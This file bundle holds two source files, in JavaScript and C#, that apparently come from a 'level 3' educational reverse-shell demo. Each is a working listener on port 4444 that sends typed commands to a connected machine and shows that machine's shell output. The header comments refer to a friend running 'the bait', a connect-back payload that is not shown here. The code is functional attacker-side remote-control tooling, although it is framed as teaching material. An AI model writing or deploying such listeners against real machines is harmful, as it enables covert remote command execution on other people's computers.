File: level_3/javascript/rs_listener.js
// ============================================================
//  LISTENER (your machine) — Educational Reverse Shell Demo
//  Run this FIRST on YOUR computer before your
//  friend runs the bait.
//
//  Usage: node rs_listener.js
//  To close: Ctrl+C in this terminal
// ============================================================

const net = require('net');
const readline = require('readline');
const PORT = 4444;

let currentSocket = null;

function getPayloadTarget() {
    try {
        const lines = require('fs').readFileSync(
            require('path').join(__dirname, '.last_target'), 'utf-8').trim().split('\n');
        if (lines.length >= 2) {
            return { ip: lines[0], port: parseInt(lines[1]) || null };
        }
    } catch {}
    return { ip: null, port: null };
}

const server = net.createServer(socket => {
    currentSocket = socket;
    console.log('\x1b[32m[+] Connection received from:', socket.remoteAddress + '\x1b[0m');
    console.log('\x1b[33m[!] You can now type commands. Type exit to close.\x1b[0m');
    console.log('\u2500'.repeat(50));

    // Read lines from keyboard and send to client
    const rl = readline.createInterface({ input: process.stdin, terminal: false });
    rl.on('line', line => {
        if (socket.writable) {
            socket.write(line + '\n');
            if (line.trim().toLowerCase() === 'exit') {
                socket.end();
            }
        }
    });

    // Display what the friend's shell responds
    socket.setEncoding('utf-8');
    socket.on('data', data => process.stdout.write(data));

    function shutdown(reason) {
        console.log('\n\x1b[31m' + reason + '\x1b[0m');
        console.log('\x1b[31m[-] Closing connection.\x1b[0m');
        rl.close();
        if (!socket.destroyed) socket.destroy();
        currentSocket = null;
        server.close(() => {
            console.log('\x1b[31m[*] Listener closed.\x1b[0m');
            process.exit(0);
        });
        setTimeout(() => process.exit(0), 1000);
    }

    socket.on('end', () => shutdown('[-] Connection closed by the client.'));

    socket.on('error', err => {
        if (err.code !== 'ECONNRESET') {
            console.error('\x1b[31m[!] Error:', err.message + '\x1b[0m');
        }
        shutdown('[-] Connection closed by the client.');
    });
});

server.listen(PORT, '0.0.0.0', () => {
    console.log('\x1b[36m\u2554' + '\u2550'.repeat(40) + '\u2557');
    console.log('\u2551  REVERSE SHELL LISTENER \u2014 Demo         \u2551');
    console.log('\u255a' + '\u2550'.repeat(40) + '\u255d\x1b[0m');
    console.log(`\x1b[33m[*] Listening on port ${PORT}...`);
    console.log('[*] Waiting for client to connect...\x1b[0m');
    console.log('');
    console.log('Connection:');
    const { ip: targetIp, port: targetPort } = getPayloadTarget();
    const dgram = require('dgram');
    const s = dgram.createSocket('udp4');
    s.connect(80, '8.8.8.8', () => {
        const ip = s.address().address;
        s.close();
        console.log(`  \x1b[32mLocal IP : ${ip}\x1b[0m`);
        if (targetIp && targetIp !== ip && targetIp !== '127.0.0.1' && targetIp !== 'localhost') {
            const portStr = targetPort ? `:${targetPort}` : '';
            console.log(`  \x1b[32mTunnel   : ${targetIp}${portStr} \u2192 ${ip}:${PORT}\x1b[0m`);
        } else {
            console.log(`  \x1b[32mListener : ${ip}:${PORT}\x1b[0m`);
        }
        console.log('');
    });
    s.on('error', () => {
        s.close();
        console.log('  \x1b[31mNo network connection\x1b[0m');
        console.log('');
    });
});

server.on('error', err => {
    if (err.code === 'EADDRINUSE') {
        console.error(`\x1b[31m[!] Port ${PORT} is already in use. Close the process that is using it.\x1b[0m`);
    } else {
        console.error('\x1b[31m[!] Error:', err.message + '\x1b[0m');
    }
    process.exit(1);
});

// Handle Ctrl+C — clean shutdown with visible message
process.on('SIGINT', () => {
    console.log('\n\x1b[31m[-] Closing connection.\x1b[0m');
    if (currentSocket && !currentSocket.destroyed) {
        currentSocket.destroy();
    }
    server.close(() => {
        console.log('\x1b[31m[*] Listener closed.\x1b[0m');
        process.exit(0);
    });
    // If server.close takes too long, force exit after 1s
    setTimeout(() => process.exit(0), 1000);
});

File: level_3/csharp/rs_listener.cs
// ============================================================
//  LISTENER (your machine) — Educational Reverse Shell Demo
//  Run this FIRST on YOUR computer before your
//  friend runs the bait.
//
//  Usage: dotnet script rs_listener.cs
//         (or compile as a .NET project with dotnet run)
//  To close: Ctrl+C in this terminal
// ============================================================

using System;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading;

const int PORT = 4444;
var closing = 0;

void Shutdown(TcpListener srv, TcpClient client, string reason = "")
{
    if (Interlocked.Exchange(ref closing, 1) == 1) return;

    if (reason.Length > 0)
    {
        Console.WriteLine($"\n\x1b[31m{reason}\x1b[0m");
        Console.WriteLine("\x1b[31m[-] Closing connection.\x1b[0m");
    }
    else
    {
        Console.WriteLine("\n\x1b[31m[-] Closing connection.\x1b[0m");
    }

    try { client?.Close(); } catch { }
    try { srv.Stop(); } catch { }

    Console.WriteLine("\x1b[31m[*] Listener closed.\x1b[0m");
    Console.Out.Flush();
    Environment.Exit(0);
}

// --- Start server ------------------------------------------------------------
var server = new TcpListener(IPAddress.Any, PORT);
server.Server.SetSocketOption(SocketOptionLevel.Socket, SocketOptionName.ReuseAddress, true);

try { server.Start(); }
catch (SocketException)
{
    Console.WriteLine($"\x1b[31m[!] Port {PORT} is already in use. Close the process that is using it.\x1b[0m");
    Environment.Exit(1);
}

Console.WriteLine("\x1b[36m\u2554" + new string('\u2550', 40) + "\u2557");
Console.WriteLine("\u2551  REVERSE SHELL LISTENER \u2014 Demo         \u2551");
Console.WriteLine("\u255a" + new string('\u2550', 40) + "\u255d\x1b[0m");
Console.WriteLine($"\x1b[33m[*] Listening on port {PORT}...");
Console.WriteLine("[*] Waiting for client to connect...\x1b[0m");
Console.WriteLine();
string targetIp = null;
int? targetPort = null;
try
{
    string lastTarget = Path.Combine(Directory.GetCurrentDirectory(), ".last_target");
    if (File.Exists(lastTarget))
    {
        string[] lines = File.ReadAllText(lastTarget).Trim().Split('\n');
        if (lines.Length >= 2)
        {
            targetIp = lines[0].Trim();
            if (int.TryParse(lines[1].Trim(), out int p)) targetPort = p;
        }
    }
}
catch { }
Console.WriteLine("Connection:");
try
{
    using var udp = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
    udp.Connect("8.8.8.8", 80);
    string ipLocal = ((IPEndPoint)udp.LocalEndPoint!).Address.ToString();
    Console.WriteLine($"  \x1b[32mLocal IP : {ipLocal}\x1b[0m");
    if (targetIp != null && targetIp != ipLocal && targetIp != "127.0.0.1" && targetIp != "localhost")
    {
        string ps = targetPort.HasValue ? $":{targetPort}" : "";
        Console.WriteLine($"  \x1b[32mTunnel   : {targetIp}{ps} \u2192 {ipLocal}:{PORT}\x1b[0m");
    }
    else
    {
        Console.WriteLine($"  \x1b[32mListener : {ipLocal}:{PORT}\x1b[0m");
    }
}
catch
{
    Console.WriteLine("  \x1b[31mNo network connection\x1b[0m");
}
Console.WriteLine();

// --- Ctrl+C ------------------------------------------------------------------
TcpClient currentClient = null;

Console.CancelKeyPress += (_, e) =>
{
    e.Cancel = true;
    Shutdown(server, currentClient);
};

// --- Wait for connection (with timeout so Ctrl+C works) ----------------------
TcpClient client = null;
while (client == null)
{
    if (server.Pending())
    {
        client = server.AcceptTcpClient();
    }
    else
    {
        Thread.Sleep(500);
    }
}
currentClient = client;

var stream = client.GetStream();
var remoteEP = (IPEndPoint)client.Client.RemoteEndPoint!;

Console.WriteLine($"\x1b[32m[+] Connection received from: {remoteEP.Address}\x1b[0m");
Console.WriteLine("\x1b[33m[!] You can now type commands. Type exit to close.\x1b[0m");
Console.WriteLine(new string('\u2500', 50));

// --- Receive thread (remote shell output -> screen) --------------------------
var recvThread = new Thread(() =>
{
    var buf = new byte[4096];
    var decoder = Encoding.UTF8.GetDecoder();
    var chars = new char[4096];
    while (true)
    {
        try
        {
            int n = stream.Read(buf, 0, buf.Length);
            if (n == 0)
            {
                Shutdown(server, client, "[-] Connection closed by the client.");
                return;
            }
            int charCount = decoder.GetChars(buf, 0, n, chars, 0);
            Console.Write(chars, 0, charCount);
        }
        catch (IOException)
        {
            Shutdown(server, client, "[-] Connection closed by the client.");
            return;
        }
        catch (ObjectDisposedException) { return; }
    }
})
{ IsBackground = true };
recvThread.Start();

// --- Main thread: keyboard -> remote shell -----------------------------------
try
{
    while (true)
    {
        string cmd = Console.ReadLine()!;
        byte[] data = Encoding.UTF8.GetBytes(cmd + "\n");
        stream.Write(data, 0, data.Length);
        stream.Flush();
        if (cmd.Trim().ToLower() == "exit")
        {
            recvThread.Join(2000);
            Shutdown(server, client);
            break;
        }
    }
}
catch (IOException)
{
    Shutdown(server, client, "[-] Connection closed by the client.");
}
catch (Exception)
{
    Shutdown(server, client);
}
